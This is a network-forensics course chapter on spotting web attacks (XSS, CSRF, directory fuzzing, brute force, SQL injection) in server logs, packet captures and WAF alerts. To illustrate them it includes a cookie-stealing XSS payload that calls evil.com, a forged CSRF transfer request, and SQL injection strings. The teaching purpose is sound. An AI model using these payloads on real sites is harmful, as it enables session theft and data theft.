Week 7 Addendum: Detecting Web Attacks

1. Introduction

The Web Attack Surface

In contemporary network architectures, public-facing web applications represent the most exposed and frequently engaged attack surface. By their very design, web servers must accept unsolicited inbound connections from untrusted sources (the public internet) to function. This operational necessity creates a direct gateway through the perimeter firewall, routing traffic directly to backend databases, internal application programming interfaces (APIs), and legacy infrastructure. At Layer 7 (the Application Layer) of the OSI model, adversaries systematically target web applications not merely to deface a webpage, but to establish an initial foothold, exfiltrate sensitive data, or pivot into the internal network.

The Forensic Imperative

Traditional security operations often focus on the binary outcome of an attack: was it blocked or was it successful? Network forensics demands a more rigorous, first-principles approach. When investigating a web-based intrusion, the forensic analyst must reconstruct the temporal sequence of events. The imperative is not just isolation, but comprehension. Analysts must parse ephemeral network traffic and static log data to answer fundamental questions: What was the initial attack vector? What vulnerabilities were targeted? Was data successfully exfiltrated, or did the payload fail to execute?

Learning Objectives

By the end of this chapter, students will be able to:

Differentiate between the mechanics of client-side and server-side web attacks.
Evaluate the limitations of server-side telemetry when investigating client-side execution.
Identify anomalous patterns indicative of directory fuzzing and authentication abuse within web access logs.
Analyze the syntax of SQL injection (SQLi) payloads and determine the success or failure of an attack based on server responses.

2. Client-Side Attacks

Core Principle

To understand client-side attacks, one must first isolate where the malicious execution occurs. In these scenarios, the web server is merely a delivery mechanism; it is neither the target nor the victim. The attack exploits the trust established between the end-user and the browser environment. By manipulating the code delivered to the client, adversaries force the victim's local machine to execute malicious instructions.

Threat Mechanics: Cross-Site Scripting (XSS)

XSS occurs when an application includes untrusted data in a web page without proper validation or escaping. The victim's browser executes the injected script under the assumption that it originated from the trusted domain. This allows the attacker to hijack session cookies or redirect the user. We categorize XSS primarily into two types based on how the payload is delivered:

1. Reflected XSS (Non-Persistent): The malicious payload is embedded directly within the request URL or form input and immediately "reflected" back by the web server in its HTTP response.

Step-by-Step Walkthrough:
1. Crafting the Vector: An attacker crafts a malicious URL containing a JavaScript payload within a parameter (e.g., http://trustedbank.com/search?query=<script>fetch('http://evil.com/?cookie='+document.cookie)</script>).
2. Delivery: The attacker tricks the victim into clicking this specific link via a phishing email or malicious message.
3. Reflection: The victim's browser sends the request to the legitimate server. The server's search function takes the query parameter and embeds it directly into the HTML response: Results for: <script>...</script>.
4. Execution: The victim's browser renders the HTML, encounters the <script> tags, and executes the payload, silently sending the user's session cookie to the attacker's server.
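
The reflection step can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions, not the code of any real application: the function names render_results_unsafe and render_results_escaped are hypothetical, and the standard-library html.escape stands in for whatever output encoding a real framework would apply.

```python
import html

def render_results_unsafe(query: str) -> str:
    # Vulnerable: the untrusted parameter is embedded in the HTML verbatim.
    return f"<p>Results for: {query}</p>"

def render_results_escaped(query: str) -> str:
    # HTML metacharacters are encoded, so the browser treats the value as text.
    return f"<p>Results for: {html.escape(query)}</p>"

payload = "<script>fetch('http://evil.com/?cookie='+document.cookie)</script>"
unsafe_page = render_results_unsafe(payload)
escaped_page = render_results_escaped(payload)

print(unsafe_page)   # contains a live <script> element
print(escaped_page)  # contains &lt;script&gt; and renders as inert text
```

In the first page the browser would parse and run the script; in the second it would only display it.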

2. Stored XSS (Persistent): The malicious payload is permanently saved (stored) in the target application's database (e.g., in a forum post, user profile, or comment section).

Step-by-Step Walkthrough:
1. Injection: The attacker locates a vulnerable input field, such as a product review section, and submits a malicious script instead of standard text.
2. Storage: The web server fails to sanitize the input and saves the script directly into its backend database.
3. Retrieval: A legitimate user navigates to the product page.
4. Execution: The server retrieves the reviews from the database and serves them to the user's browser. The browser executes the attacker's script silently in the background of the victim's session.

Threat Mechanics: Cross-Site Request Forgery (CSRF)

While XSS exploits the user's trust in a website, CSRF exploits the web application's trust in the user's browser.

Step-by-Step Walkthrough:
1. Authentication: The victim logs into their bank (bank.com), establishing a valid session cookie.
2. Lure: In a separate tab, the victim browses to an attacker-controlled site (evil.com).
3. Forged Request: The attacker's site contains hidden code (like an invisible <img> tag) that forces the browser to make a request to the bank: <img src="http://bank.com/transfer?amount=1000&toAccount=Attacker">.
4. Exploitation: Unless SameSite cookie restrictions or anti-CSRF tokens are in place, the victim's browser automatically attaches the bank.com session cookie to the request. The bank sees a valid, authenticated request and executes the transfer.
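
One place a forged request can sometimes be spotted is the Referer header, which may name the attacker's page. The sketch below is a rough heuristic, not a reliable detector: the helper is_cross_site and the sample request/Referer pairs are hypothetical, and browsers or privacy settings frequently omit the Referer altogether.

```python
from urllib.parse import urlparse

def is_cross_site(referer: str, expected_host: str) -> bool:
    """Return True when a Referer is present and names a different host."""
    if not referer or referer == "-":
        return False  # absent Referer: nothing can be concluded either way
    return urlparse(referer).hostname != expected_host

# Hypothetical (request, Referer) pairs as they might be pulled from a log.
requests = [
    ("GET /transfer?amount=1000&toAccount=Attacker", "http://evil.com/cats.html"),
    ("GET /transfer?amount=50&toAccount=Alice", "http://bank.com/payments"),
    ("GET /transfer?amount=20&toAccount=Bob", "-"),
]

suspicious = [line for line, ref in requests if is_cross_site(ref, "bank.com")]
print(suspicious)
```

Only the transfer that arrived with an evil.com Referer is flagged; the request with no Referer is left undecided.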

Forensic Visibility Challenges

Client-side attacks present significant blind spots for network forensic analysts relying solely on server-side infrastructure. Because an XSS payload executes entirely within the victim's browser, server access logs reflect only an ordinary GET or POST request. A reflected payload sent in a GET parameter may appear in the logged URI, but a payload submitted in a POST body, or one stored earlier and merely retrieved, will not. In every case, the server successfully delivered the requested HTML/JS; it has no awareness of how that code behaved once rendered. Detecting these attacks typically requires endpoint telemetry, browser history forensics, or analysis of full packet captures (PCAPs) for anomalous outbound requests originating from the client.

3. Server-Side Attacks

Core Principle

In direct contrast to client-side vectors, server-side attacks target the infrastructure, the application logic, or the backend databases. Here, the web server is the victim. The execution of the exploit occurs on the server's hardware, manipulating the application's intended behavior to bypass access controls, extract unauthorized data, or achieve remote code execution (RCE).

Threat Mechanics: Directory Fuzzing and Content Discovery

Before an attacker can exploit a vulnerability, they must map the application's structure to find unlinked, hidden, or unprotected resources (e.g., /admin, /backup.zip, /api/v1/users).

Step-by-Step Walkthrough:
1. Wordlist Selection: The attacker selects a text file containing thousands of common directory names and file extensions.
2. Automated Iteration: Using tools like Gobuster or ffuf, the attacker automates HTTP GET requests to the target server, appending each word from the list to the base URL.
3. Response Analysis: The tool parses the server's HTTP status codes. A 404 Not Found indicates the resource does not exist. A 200 OK or 403 Forbidden indicates the resource exists, providing the attacker with a new target.

Threat Mechanics: Authentication Abuse (Brute-Force)

Adversaries routinely target login portals to gain unauthorized access by systematically guessing credentials.

Step-by-Step Walkthrough:
1. Target Identification: The attacker identifies the authentication endpoint (e.g., POST /login.php).
2. Payload Generation: The attacker configures a tool (like Hydra or Burp Suite Intruder) with a known username (e.g., admin) and a dictionary of common passwords.
3. Execution: The tool fires rapid POST requests, swapping the password parameter on each attempt.
4. Validation: The attacker analyzes the HTTP responses. Failed attempts will typically return a 401 Unauthorized. A successful attempt often triggers a 302 Found redirect to a dashboard (e.g., Location: /admin_dashboard.php), signaling a breach.

Threat Mechanics: SQL Injection (SQLi)

Web applications frequently construct dynamic database queries based on user input. If this input is not properly sanitized, an attacker can append their own SQL commands, altering the underlying logic of the query executed by the backend database.

Step-by-Step Walkthrough (Authentication Bypass):
1. The Flawed Logic: The backend PHP code expects a username and password to construct this query: SELECT * FROM users WHERE username = '$user' AND password = '$password';
2. The Injection: The attacker inputs admin' OR '1'='1 into the username field and leaves the password blank.
3. The Manipulation: The application concatenates the input blindly, sending this query to the database: SELECT * FROM users WHERE username = 'admin' OR '1'='1' AND password = '';
4. The Execution: In SQL, AND binds more tightly than OR, so the database evaluates the condition as username = 'admin' OR ('1'='1' AND password = ''). The first branch is true for the admin row regardless of its password, so that row matches.
5. The Result: The database returns the administrator's record, and the application logs the attacker in without a valid password.

Note

This is a very simple example of SQLi. Depending on the attacker's knowledge of SQL, they could craft far more complex queries to dump other tables or to enumerate the overall database schema. The primary protection is for developers to use parameterized queries (prepared statements), which keep user input separate from the SQL text; input validation is a useful additional layer. Merely disallowing specific characters such as `, ', or = is easy to bypass and tends to reject legitimate input.
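
The authentication bypass can be reproduced safely against an in-memory SQLite database. This is a minimal sketch, not the course's PHP code: the table contents and the function names login_vulnerable and login_parameterized are made up for illustration, and SQLite stands in for whatever database the application actually uses.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?)",
    [("admin", "s3cret"), ("alice", "hunter2")],  # hypothetical accounts
)

def login_vulnerable(user: str, password: str):
    # Vulnerable: user input is concatenated into the SQL text.
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{user}' AND password = '{password}'"
    )
    return conn.execute(query).fetchall()

def login_parameterized(user: str, password: str):
    # Placeholders keep the input as data; it is never parsed as SQL.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (user, password)).fetchall()

injection = "admin' OR '1'='1"
vulnerable_rows = login_vulnerable(injection, "")
safe_rows = login_parameterized(injection, "")

print(vulnerable_rows)
print(safe_rows)
```

With this data, the concatenated version returns the admin row despite the empty password, while the parameterized version returns no rows because no user is literally named admin' OR '1'='1.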

Forensic Visibility

Because server-side attacks directly interact with the application and its underlying infrastructure, they generate a high volume of forensic artifacts.

Fuzzing leaves a distinct signature of rapid, sequential requests from a single IP resulting in high volumes of 404 Not Found status codes, often accompanied by non-standard User-Agent strings indicative of automated tooling (e.g., User-Agent: gobuster/3.1.0).
Authentication Abuse is highly visible as clusters of POST requests targeting a specific authentication URI, resulting in repeated failed states followed by a sudden state change (like a session cookie issuance or a 302 redirect).
SQL Injection artifacts are frequently captured in both network packet captures and server access logs, as the malicious SQL syntax (often URL-encoded, like %27+OR+%271%27%3D%271) is directly visible within the URI of a GET request or extractable from the payload body of a POST request in a PCAP.

4. Log-Based Detection

Core Principle

Web servers generate continuous, standardized records of every client interaction. For the network forensic analyst, these access logs serve as the foundational timeline of an incident. Log-based detection operates on the principle of anomaly identification: by establishing a baseline of legitimate user behavior, analysts can programmatically or manually identify the statistical deviations and malicious signatures indicative of an attack.

Anatomy of an Access Log

Before attempting to detect anomalies, one must understand the structure of the baseline. Most web servers (including Apache and Nginx) utilize the NCSA Extended/Combined Log Format.

Consider the following standard log entry: 192.168.1.50 - - [20/Feb/2026:14:22:10 -0500] "GET /about.html HTTP/1.1" 200 5120 "http://example.com/home" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."

Let us break down this string into its forensic components:

192.168.1.50 (Client IP): The origin of the request.
- - (Identity & User): Typically unused (hyphens) unless HTTP authentication is explicitly configured.
[20/Feb/2026:14:22:10 -0500] (Timestamp): The exact server time the request was processed, critical for timeline reconstruction.
"GET /about.html HTTP/1.1" (Request Line): Contains the HTTP Method (GET), the requested Uniform Resource Identifier (URI), and the protocol version.
200 (Status Code): The server's response. 200 indicates success.
5120 (Size): The size of the returned object in bytes.
"http://example.com/home" (Referer): The page that linked the user to this requested URI.
"Mozilla/5.0..." (User-Agent): The client application (browser, OS, or automated tool) making the request.

Identifying Attack Signatures in Logs

By analyzing access logs, analysts can reconstruct the methodology of server-side attacks through distinct temporal and structural patterns.
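
Working with these patterns programmatically starts with splitting each entry into the fields described in the anatomy above. The following is a minimal sketch, assuming well-formed Combined Log Format lines; the names LOG_PATTERN and parse_line are illustrative, and malformed request lines (which attackers do send) simply return None here.

```python
import re
from datetime import datetime

LOG_PATTERN = re.compile(
    r'(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<protocol>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

def parse_line(line: str):
    """Split one Combined Log Format entry into a dict, or return None."""
    match = LOG_PATTERN.match(line)
    if match is None:
        return None
    entry = match.groupdict()
    entry["status"] = int(entry["status"])
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    # Keep the UTC offset so entries from different servers can be aligned.
    entry["time"] = datetime.strptime(entry["time"], "%d/%b/%Y:%H:%M:%S %z")
    return entry

sample = (
    '192.168.1.50 - - [20/Feb/2026:14:22:10 -0500] "GET /about.html HTTP/1.1" '
    '200 5120 "http://example.com/home" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)..."'
)
entry = parse_line(sample)
print(entry["ip"], entry["method"], entry["uri"], entry["status"], entry["size"])
```

Parsing the timestamp into a timezone-aware value matters for timeline reconstruction, since logs from several hosts rarely share an offset.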

1. Directory Fuzzing Signature

Fuzzing tools generate highly anomalous traffic patterns characterized by speed, volume, and failure rates.

Forensic Indicators:

A single IP address making hundreds of requests per second.
A high ratio of 404 Not Found status codes as the tool guesses incorrect directories.
Suspicious or default User-Agent strings belonging to known offensive tools.

Log Example:

10.10.10.99 - - [20/Feb/2026:15:01:01 -0500] "GET /admin HTTP/1.1" 403 125 "-" "gobuster/3.1.0"
10.10.10.99 - - [20/Feb/2026:15:01:01 -0500] "GET /administrator HTTP/1.1" 404 212 "-" "gobuster/3.1.0"
10.10.10.99 - - [20/Feb/2026:15:01:01 -0500] "GET /backup.zip HTTP/1.1" 200 85400 "-" "gobuster/3.1.0"

Analysis: The attacker (10.10.10.99) is using Gobuster. The 403 on /admin confirms that the path exists, and the tool discovered an accessible /backup.zip file (indicated by the 200 OK status and the large 85,400-byte response size), which potentially represents a severe data leak.
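
The 404-ratio indicator lends itself to a simple per-IP count. The sketch below is one rough way to do it, not a tuned detector: the function not_found_ratios, the 0.5 threshold, and the generated sample lines are all assumptions for illustration, and real baselines vary by site.

```python
import re
from collections import Counter, defaultdict

# Captures the client IP and the status code of a Combined Log Format line.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[^"]*" (\d{3}) ')

def not_found_ratios(lines, min_requests=3):
    """Per-IP share of 404 responses, for IPs with at least min_requests hits."""
    statuses = defaultdict(Counter)
    for line in lines:
        m = LINE.match(line)
        if m:
            statuses[m.group(1)][m.group(2)] += 1
    ratios = {}
    for ip, counts in statuses.items():
        total = sum(counts.values())
        if total >= min_requests:
            ratios[ip] = counts["404"] / total
    return ratios

def make_line(ip, path, status):
    # Hypothetical helper that fabricates a log line for the demo.
    return f'{ip} - - [20/Feb/2026:15:01:01 -0500] "GET {path} HTTP/1.1" {status} 212 "-" "-"'

lines = [make_line("10.10.10.99", f"/guess{i}", 404) for i in range(8)]
lines += [make_line("10.10.10.99", "/admin", 403), make_line("10.10.10.99", "/backup.zip", 200)]
lines += [make_line("192.168.1.50", "/about.html", 200) for _ in range(4)]
lines += [make_line("192.168.1.50", "/missing.png", 404)]

ratios = not_found_ratios(lines)
flagged = sorted(ip for ip, ratio in ratios.items() if ratio >= 0.5)
print(flagged)
```

An ordinary visitor who hits one broken link stays well under the threshold, while the scanning address stands out. Request rate and User-Agent would normally be checked alongside the ratio.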

2. Authentication Abuse (Brute-Force) Signature

Brute-force attacks against login portals leave a trail of repeated state-change requests.

Forensic Indicators:

Clusters of POST requests targeting the same authentication endpoint (e.g., /login).
Identical response sizes for failed attempts (as the server repeatedly returns the same "Invalid Password" HTML page).
A sudden shift in the HTTP status code from a 401 (Unauthorized) to a 302 Found (redirect to an authenticated dashboard), indicating a successful compromise.

Log Example:

10.10.10.99 - - [20/Feb/2026:15:10:22 -0500] "POST /login.php HTTP/1.1" 401 450 "-" "Hydra"
10.10.10.99 - - [20/Feb/2026:15:10:23 -0500] "POST /login.php HTTP/1.1" 401 450 "-" "Hydra"
10.10.10.99 - - [20/Feb/2026:15:10:24 -0500] "POST /login.php HTTP/1.1" 302 0 "-" "Hydra"
10.10.10.99 - - [20/Feb/2026:15:10:25 -0500] "GET /dashboard.php HTTP/1.1" 200 8900 "-" "Hydra"

Analysis: The attacker utilized Hydra. The first two attempts failed (Status 401, size 450). The third attempt succeeded, resulting in a 302 redirect, followed immediately by the attacker accessing the protected /dashboard.php.
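
The "failures followed by a sudden success" pattern can be searched for mechanically. This is a minimal sketch under simple assumptions: the function find_bruteforce_success and its min_failures threshold are hypothetical, failures are assumed to return 401 and success 302 as in the example, and applications that answer failed logins with 200 would need a different test (such as response size).

```python
import re

# Captures client IP, method, URI, and status from a Combined Log Format line.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def find_bruteforce_success(lines, login_uri="/login.php", min_failures=2):
    """Return IPs whose POSTs to login_uri show >= min_failures 401s, then a 302."""
    failures = {}
    compromised = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, method, uri, status = m.groups()
        if method != "POST" or uri != login_uri:
            continue
        if status == "401":
            failures[ip] = failures.get(ip, 0) + 1
        elif status == "302":
            if failures.get(ip, 0) >= min_failures:
                compromised.append(ip)
            failures[ip] = 0  # reset the streak after any redirect
    return compromised

log = [
    '10.10.10.99 - - [20/Feb/2026:15:10:22 -0500] "POST /login.php HTTP/1.1" 401 450 "-" "Hydra"',
    '10.10.10.99 - - [20/Feb/2026:15:10:23 -0500] "POST /login.php HTTP/1.1" 401 450 "-" "Hydra"',
    '10.10.10.99 - - [20/Feb/2026:15:10:24 -0500] "POST /login.php HTTP/1.1" 302 0 "-" "Hydra"',
    '10.10.10.99 - - [20/Feb/2026:15:10:25 -0500] "GET /dashboard.php HTTP/1.1" 200 8900 "-" "Hydra"',
]

hits = find_bruteforce_success(log)
print(hits)
```

A user who mistypes a password once and then logs in would not be flagged at this threshold; in practice the threshold would be far higher than two.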

3. SQL Injection (SQLi) Signature in GET Requests

When SQLi payloads are delivered via the URL (HTTP GET), the malicious syntax is captured directly in the log's Request Line.

Forensic Indicators:

Unexpected characters in URL parameters (e.g., ', ", ;, --).
The presence of SQL keywords (UNION, SELECT, SLEEP) which are often URL-encoded by the browser or tool.

Log Example:

10.10.10.99 - - [20/Feb/2026:15:20:00 -0500] "GET /item.php?id=1%27+UNION+SELECT+username,password+FROM+users-- HTTP/1.1" 200 1024 "-" "Mozilla/5.0..."

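Analysis: The attacker injected a UNION-based SQL payload. Notice the URL encoding: %27 is a single quote ('), and + represents a space. The server returned a 200 OK, which shows only that a page was served without error; on its own it does not prove that the query executed or that data was reflected to the attacker. Comparing the 1,024-byte response with the size of a normal /item.php response can hint at whether extra content was returned.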
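
Decoding the URI before searching it makes these indicators much easier to match. The sketch below is a deliberately naive illustration: the pattern SQLI_PATTERN and the function inspect_uri are assumptions, the token list covers only the indicators named above, and legitimate values (a surname such as O'Brien, a search for "select") would produce false positives.

```python
import re
from urllib.parse import unquote_plus

# Quote, comment marker, statement separator, or a few SQL keywords.
SQLI_PATTERN = re.compile(r"('|--|;|\b(?:union|select|sleep)\b)", re.IGNORECASE)

def inspect_uri(uri: str):
    """URL-decode a logged URI and list the suspicious tokens it contains."""
    # Simplification: '+' is decoded as a space across the whole URI.
    decoded = unquote_plus(uri)
    tokens = sorted({m.group(0).lower() for m in SQLI_PATTERN.finditer(decoded)})
    return decoded, tokens

uri = "/item.php?id=1%27+UNION+SELECT+username,password+FROM+users--"
decoded, tokens = inspect_uri(uri)
print(decoded)
print(tokens)
```

The decoded form shows the payload as the database would have received it, which is usually the most useful view for the analyst's report.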

Limitations of Log Analysis

While indispensable, web server logs possess a critical forensic blind spot: in their default configuration, they do not record the HTTP message body. In the brute-force example above, the log proves the attacker sent POST requests, but it cannot reveal which passwords they guessed, nor the specific password that finally granted access. To achieve full Layer 7 visibility, analysts must pivot from logs to network packet captures.

5. Network-Based Detection

Core Principle

Network-based detection utilizes deep packet inspection (DPI) to uncover the complete context of an attack sequence. By capturing and analyzing raw network traffic in a Packet Capture (PCAP) format, forensic analysts transcend the metadata provided by logs and examine the actual data payload exchanged between the client and the server.

Packet Capture (PCAP) Fundamentals

To analyze PCAPs, analysts rely on protocol analyzers like Wireshark. Because web servers handle massive volumes of traffic, identifying the malicious needle in the haystack requires precise filtering. Berkeley Packet Filter (BPF) expressions limit which packets are captured, while Wireshark display filters isolate specific behaviors within an existing capture. The following are display filters:

http.request.method == "POST" (Isolates form submissions and logins)
http.response.code == 302 (Isolates redirects, often following a successful login)
ip.addr == 10.10.10.99 (Isolates all traffic to/from a known attacker IP)

Following the HTTP Stream

When investigating an HTTP attack, looking at isolated packets is inefficient. Wireshark's "Follow HTTP Stream" feature reassembles the fragmented packets back into a continuous, human-readable conversation, displaying the client's request (typically in red) and the server's response (typically in blue).

Uncovering the "Unseen" Payload

The primary advantage of PCAP analysis is the ability to inspect the HTTP body, resolving the blind spots inherent in server logs.

1. Extracting Brute-Force Credentials: While a log only shows that a POST request occurred, the PCAP stream reveals the exact clear-text parameters submitted by the attacker.

PCAP Stream View:

POST /login.php HTTP/1.1
Host: 192.168.1.50
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

username=admin&password=P@ssw0rd123!

By analyzing the stream associated with the 302 Found success log, the analyst can definitively identify the compromised password and immediately initiate an account reset.
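
Once a request has been exported from the stream, the submitted fields can be pulled out with the standard library. This is a minimal sketch, assuming an unencrypted, form-encoded request saved as raw bytes; the function extract_form_fields is hypothetical, and the Content-Length header is computed from the body rather than typed by hand.

```python
from urllib.parse import parse_qs

body = b"username=admin&password=P@ssw0rd123!"
raw_request = (
    b"POST /login.php HTTP/1.1\r\n"
    b"Host: 192.168.1.50\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    + b"Content-Length: %d\r\n\r\n" % len(body)
    + body
)

def extract_form_fields(request: bytes) -> dict:
    """Split headers from body and decode a form-encoded body into a dict."""
    head, _, payload = request.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    # Trust Content-Length when present so trailing bytes are ignored.
    length = int(headers.get("content-length", len(payload)))
    fields = parse_qs(payload[:length].decode(), keep_blank_values=True)
    return {key: values[0] for key, values in fields.items()}

credentials = extract_form_fields(raw_request)
print(credentials)
```

Running the same extraction over every POST in the capture yields the full list of guessed passwords, not just the one that succeeded.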

2. Validating SQL Exfiltration: If an attacker uses a boolean-based or UNION-based SQL injection, the server log will show a 200 OK. However, the log cannot confirm if sensitive data was actually returned. By following the HTTP stream of the server's response in the PCAP, the analyst can inspect the returned HTML. If the stream contains a database dump or a capture-the-flag (CTF) marker (e.g., THM{flag_found}), the analyst has definitive proof of data exfiltration.

The HTTPS Challenge

It is critical to acknowledge that the depth of visibility provided by PCAP analysis is entirely dependent on the traffic being unencrypted (HTTP). In modern environments, most web traffic is encrypted via TLS (HTTPS). If an analyst opens an HTTPS PCAP in Wireshark, the Application Layer data (the HTTP headers and body) will appear only as ciphertext.

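To perform deep packet inspection on HTTPS traffic, the forensic analyst must be able to decrypt it within the protocol analyzer before the HTTP streams can be reconstructed and analyzed. The server's private key is sufficient only for sessions that use RSA key exchange. For cipher suites with forward secrecy (ECDHE or DHE), and for all TLS 1.3 sessions, the analyst needs the per-session secrets, which are commonly exported by an endpoint through the SSLKEYLOGFILE environment variable.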

6. Web Application Firewalls (WAF)

Core Principle

Traditional network firewalls operate at Layer 3 (Network) and Layer 4 (Transport) of the OSI model, making filtering decisions based on IP addresses, protocols, and ports. However, web attacks inherently rely on permitted ports, specifically port 80 (HTTP) and port 443 (HTTPS). A traditional firewall will allow a malicious SQL injection payload through because the traffic uses an authorized port.

To defend against Layer 7 (Application) attacks, organizations deploy Web Application Firewalls (WAFs). A WAF typically acts as a reverse proxy, sitting between the web application and the internet (or runs as a module embedded in the web server), inspecting the actual HTTP/HTTPS conversation payload before it reaches the backend application.

WAF Detection Mechanics

WAFs utilize a combination of detection methodologies to identify and block malicious web traffic:

Signature-Based Detection: The WAF compares incoming HTTP requests (headers, URIs, and bodies) against a vast database of known attack patterns. For example, if a POST request contains the string <script>alert(1)</script>, the WAF matches this to a known XSS signature and blocks the request.
Behavioral/Anomaly-Based Detection: The WAF establishes a baseline of "normal" application behavior. If an application typically receives GET requests with a single, integer-based parameter (e.g., ?id=5), a sudden POST request to the same endpoint containing 500 lines of encoded text will trigger an anomaly alert.
Virtual Patching: When a new vulnerability (CVE) is discovered in a web application framework, administrators can apply a custom WAF rule to block exploit attempts at the perimeter, buying time to patch the underlying application code.
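
Signature-based detection can be illustrated with a toy matcher. This sketch is far simpler than any production rule set: the two patterns in SIGNATURES and the functions inspect_request and decide are made up for the example, and the final call shows how a small obfuscation slips past a naive pattern.

```python
import re
from urllib.parse import unquote_plus

# Two hypothetical signatures; real rule sets contain hundreds.
SIGNATURES = {
    "xss-script-tag": re.compile(r"<script\b", re.IGNORECASE),
    "sqli-union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE),
}

def inspect_request(uri: str, body: str = ""):
    """Return the names of all signatures matched by the decoded URI or body."""
    decoded = unquote_plus(uri) + "\n" + unquote_plus(body)
    return [name for name, pattern in SIGNATURES.items() if pattern.search(decoded)]

def decide(uri: str, body: str = "") -> int:
    # 403 mimics a blocking WAF; 200 stands for "passed to the backend".
    return 403 if inspect_request(uri, body) else 200

print(decide("/search", "comment=<script>alert(1)</script>"))
print(inspect_request("/item.php?id=1%27+UNION+SELECT+username,password+FROM+users--"))
print(decide("/item.php?id=5"))
# An inline SQL comment replaces the whitespace the pattern expects.
print(inspect_request("/item.php?id=1%27+UNION/**/SELECT+1"))
```

The last request carries the same intent as the second but matches nothing, which is why signature matching is normally combined with normalization and anomaly scoring.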

WAF Forensics

For the network forensic analyst, WAF logs are a goldmine of contextual intelligence. While standard access logs only record the metadata of a transaction, WAF logs explicitly categorize the identified threat.

Forensic Indicators:

Rule IDs from established rule sets such as the OWASP Core Rule Set (CRS), whose rule files are grouped by attack category.
Action taken by the WAF (e.g., Blocked, Flagged, Simulated).
The specific payload snippet that triggered the alert.

WAF Log Example (simplified, ModSecurity-style format):

[20/Feb/2026:16:05:12 -0500] [192.168.1.50/sid#7f8b9c] [client 10.10.10.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\s+all\\s+select))" at ARGS:username. [file "/etc/modsecurity/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [id "942100"] [msg "SQL Injection Attack Detected via libinjection"] [severity "CRITICAL"] [hostname "example.com"] [uri "/login.php"]

Analysis: Unlike an Apache log, this ModSecurity WAF log explicitly tells the analyst what happened. The attacker (10.10.10.99) attempted an SQL Injection using a UNION ALL SELECT payload within the username parameter of /login.php. The WAF successfully intercepted the attack at Layer 7 and returned a 403 Forbidden status, actively preventing the exploit.
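
Because the alert is built from bracketed key/value pairs, the fields an analyst cares about can be extracted with a few regular expressions. This is a rough sketch tailored to the example entry above, not a general ModSecurity parser; the function parse_alert and the derived keys client, code, and target are assumptions for illustration.

```python
import re

line = (
    r'[20/Feb/2026:16:05:12 -0500] [192.168.1.50/sid#7f8b9c] [client 10.10.10.99] '
    r'ModSecurity: Access denied with code 403 (phase 2). '
    r'Pattern match "(?i:(?:union\\s+all\\s+select))" at ARGS:username. '
    r'[file "/etc/modsecurity/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] '
    r'[id "942100"] [msg "SQL Injection Attack Detected via libinjection"] '
    r'[severity "CRITICAL"] [hostname "example.com"] [uri "/login.php"]'
)

def parse_alert(entry: str) -> dict:
    """Collect the [key "value"] pairs plus client IP, status code, and target."""
    fields = dict(re.findall(r'\[(\w+) "([^"]*)"\]', entry))
    client = re.search(r'\[client ([^\]\s]+)\]', entry)
    code = re.search(r'with code (\d{3})', entry)
    target = re.search(r' at ([A-Z_]+:\w+)\.', entry)
    fields["client"] = client.group(1) if client else None
    fields["code"] = int(code.group(1)) if code else None
    fields["target"] = target.group(1) if target else None
    return fields

alert = parse_alert(line)
print(alert["client"], alert["id"], alert["severity"], alert["uri"], alert["target"])
```

Keyed this way, WAF alerts can be joined to access-log entries on client IP, URI, and timestamp.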

The Evasion Factor

It is crucial to remember that WAFs are not infallible. Attackers constantly develop bypass techniques using encoding (e.g., Hex, Base64, Unicode) or obfuscation to disguise their payloads from signature-based detection. A sophisticated attacker might bypass the WAF, meaning the malicious payload will execute on the server but will not appear in the WAF alerts, highlighting why analysts cannot rely on a single defensive layer.

7. Chapter Summary

The forensic investigation of web attacks requires a fundamental understanding of the dynamic relationship between the client browser, the network transport layer, and the backend application server.

Key Takeaways

Vector Mechanics Dictate Visibility: Client-side attacks (XSS, CSRF) weaponize the end-user's browser, leaving minimal forensic footprint on the server itself. Server-side attacks (Directory Fuzzing, Brute-Force, SQLi) target the application logic, generating high volumes of log and network artifacts.
The Limitations of Telemetry: Server access logs provide the temporal metadata of an attack—the who, when, and where. However, they possess a critical blind spot regarding HTTP POST bodies.
The Power of Correlation: First-principles network forensics demands the correlation of multiple data sources.
- Access Logs define the timeline and highlight statistical anomalies.
- Packet Captures (PCAPs) provide the raw truth of the data exchange, exposing exfiltrated data and clear-text payloads within HTTP streams.
- WAF Logs provide immediate threat categorization and context regarding blocked exploits.

By mastering the syntax of these logs and the filtering techniques within protocol analyzers, forensic analysts move beyond simply acknowledging that an attack occurred; they gain the capability to definitively reconstruct the adversary's methodology and determine the precise scope of the compromise.